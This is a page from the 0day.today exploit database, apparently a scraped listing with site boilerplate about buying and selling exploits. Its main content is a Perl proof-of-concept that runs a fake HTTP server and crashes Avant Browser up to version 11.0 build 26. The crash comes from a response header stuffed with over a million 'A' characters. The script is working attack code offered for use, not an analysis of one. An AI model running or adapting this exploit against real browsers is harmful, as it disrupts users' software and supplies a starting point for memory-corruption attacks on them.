0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Avant Browser <= 11.0 build 26 Remote Stack Overflow Crash Exploit
================================================================== Avant Browser <= 11.0 build 26 Remote Stack Overflow Crash Exploit ================================================================== #!/usr/bin/perl # Avant Browser (ALL Version) Remot Stack OverFlow (Crash) # Discovered by DATA_SNIPER # Usage: # connect from Avant browser to http://127.0.0.1/ use IO::Socket; my $sock=new IO::Socket::INET ( Listen => 1, LocalAddr => 'localhost', LocalPort => 80, Proto => 'tcp'); die unless $sock; $huge="A" x 1034985; $|=1; print "==========================================================================\n"; print " Avant Browser (ALL Version) Remot Stack OverFlow (Crash) "; print " Vulnerability Discovered by DATA_SNIPER "; print " GreetZ To:Hacking Master,Dear Devil,Xodia,JASS,All Algerian Hackers \n"; print " Mail me at:Alpha_3(at)hotmail(dot)com\n"; print "==========================================================================\n"; print"[+] Http server started on port 80... \n"; print"[+] Try To Explorer http://127.0.0.1/ \n"; $z=$sock->accept(); print"[+] Connection Accepted!\n"; do { $ln=<$z>; print $ln; chomp $ln; if (($ln eq "")||($ln eq "\n")||($ln eq "\r")) { print"[>]Sending Evil Packet\n"; print $z " HTTP/1.1 200 OK\r\nServer: bugs 3.1.02\r\nContent-Type:$huge\r\nConnection: close\r\n\r\n"; close($z); exit; } } while (true); # 0day.today [2024-11-15] #